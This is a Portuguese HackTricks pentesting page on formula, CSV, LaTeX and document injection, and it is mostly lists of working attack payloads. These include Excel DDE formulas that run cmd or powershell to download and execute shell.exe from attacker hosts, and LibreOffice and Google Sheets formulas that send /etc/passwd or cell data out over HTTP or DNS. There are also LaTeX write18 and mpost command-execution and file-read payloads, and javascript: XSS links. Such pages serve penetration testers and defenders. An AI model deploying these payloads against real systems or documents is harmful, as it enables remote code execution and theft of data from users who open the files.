hacktricks/pentesting-web/formula-doc-latex-injection.md

13 KiB
Raw Blame History

Injeção de Fórmula/CSV/Doc/LaTeX

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Injeção de Fórmula

Informação

Se a sua entrada está sendo refletida dentro de arquivos CSV (ou qualquer outro arquivo que provavelmente será aberto pelo Excel), você pode ser capaz de colocar fórmulas do Excel que serão executadas quando o usuário abrir o arquivo ou quando o usuário clicar em algum link dentro da planilha do Excel.

{% hint style="danger" %} Atualmente, o Excel alertará (várias vezes) o usuário quando algo é carregado de fora do Excel para evitar que ele realize ações maliciosas. Portanto, um esforço especial em Engenharia Social deve ser aplicado à carga final. {% endhint %}

Lista de palavras

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

O exemplo a seguir é muito útil para exfiltrar conteúdo da planilha final do Excel e realizar solicitações para locais arbitrários. Mas requer que o usuário clique no link (e aceite as mensagens de aviso).

Exemplo retirado de https://payatu.com/csv-injection-basic-to-exploit

Vamos assumir um cenário de ataque ao sistema de gerenciamento de registros de estudantes de uma escola. O aplicativo permite que o professor insira detalhes dos alunos na escola. O atacante obtém acesso ao aplicativo e deseja que todos os professores que usam o aplicativo sejam comprometidos. Então, o atacante tenta realizar um ataque de injeção de CSV por meio do aplicativo da web.
O atacante precisa roubar os detalhes de outros alunos. Então, o atacante usa a fórmula de Hiperlink e a insere ao inserir os detalhes do aluno.

Quando o professor exporta o CSV e clica no hiperlink, os dados sensíveis são enviados para o servidor do atacante.

O arquivo CSV exportado contém carga maliciosa nele.

Os detalhes do aluno são registrados no servidor web do atacante.

RCE

Para que este exemplo funcione, é necessário habilitar a seguinte configuração:
Arquivo → Opções → Central de Confiabilidade → Configurações da Central de Confiabilidade → Conteúdo Externo → Habilitar o Lançamento do Servidor de Troca Dinâmica de Dados
ou o uso de uma versão antiga do Excel.

A boa notícia é que essa carga é executada automaticamente quando o arquivo é aberto (se o usuário aceitar as mensagens de aviso).

É possível executar uma calculadora com a seguinte carga =cmd|' /C calc'!xxx

Mais

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

LFI

LibreOffice Calc

  • Isso lerá a primeira linha do arquivo local /etc/passwd: ='file:///etc/passwd'#$passwd.A1
  • Exfiltrá-lo: =WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))
  • Exfiltrar mais de uma linha: =WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
  • Exfiltração de DNS: =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))

Analisando a carga de exfiltração de DNS:

  • file:///etc/passwd#$passwd.A19 Lerá a 19ª linha do arquivo local /etc/passwd
  • ENCODEURL(file:///etc/passwd#$passwd.A19) Codifica em URL os dados retornados
  • MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41) Similar a substring, lê dados do 1º caractere ao 41º uma maneira muito útil de restringir o comprimento dos nomes de host DNS (limite de 254 caracteres em FQDN e 63 caracteres para um rótulo, ou seja, subdomínio)
  • SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“) substitui todas as instâncias de % (o caractere especial da codificação de URL) por traço isso garante que apenas caracteres DNS válidos sejam usados
  • CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“)),”.<FQDN>”) Concatena a saída do arquivo (após o processamento acima ter ocorrido) com o FQDN (para o qual temos acesso ao host que é autoritário para o domínio)
  • WEBSERVICE fará uma solicitação para este nome DNS inexistente, que podemos então analisar os logs (ou executar tcpdump etc.) no servidor de nome autoritário DNS para o qual temos controle

Google Sheets OOB Data Exfiltration

Em primeiro lugar, vamos apresentar algumas das funções mais interessantes.

CONCATENATE: Anexa strings umas às outras.

=CONCATENATE(A2:E2)

IMPORTXML: Importa dados de vários tipos de dados estruturados, incluindo XML, HTML, CSV, TSV e feeds XML RSS e ATOM.

=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")

IMPORTFEED: Importa um feed RSS ou ATOM.

=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))

IMPORTHTML: Importa dados de uma tabela ou lista dentro de uma página HTML.

=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)

IMPORTRANGE: Importa um intervalo de células de uma planilha especificada.

=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")

IMAGEM: Insere uma imagem em uma célula.

=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")

Injeção de LaTeX

Normalmente, os servidores que encontramos na internet que convertem código LaTeX em PDF usam pdflatex. Este programa usa 3 atributos principais para permitir ou não a execução de comandos:

  • --no-shell-escape: Desabilita a construção \write18{comando}, mesmo que esteja habilitada no arquivo texmf.cnf.
  • --shell-restricted: Mesmo que --shell-escape, mas limitado a um conjunto 'seguro' de **comandos predefinidos (**No Ubuntu 16.04, a lista está em /usr/share/texmf/web2c/texmf.cnf).
  • --shell-escape: Habilita a construção \write18{comando}. O comando pode ser qualquer comando de shell. Essa construção é normalmente desabilitada por motivos de segurança.

No entanto, existem outras maneiras de executar comandos, portanto, para evitar RCE, é muito importante usar --shell-restricted.

Ler arquivo

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Ler arquivo de uma única linha

ewread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Ler arquivo com várias linhas

ewread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

Escrever arquivo

ewwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Execução de comando

A entrada do comando será redirecionada para stdin, use um arquivo temporário para obtê-lo.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Se você receber algum erro LaTex, considere usar base64 para obter o resultado sem caracteres ruins.

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}

Cross Site Scripting

De @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Referências

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥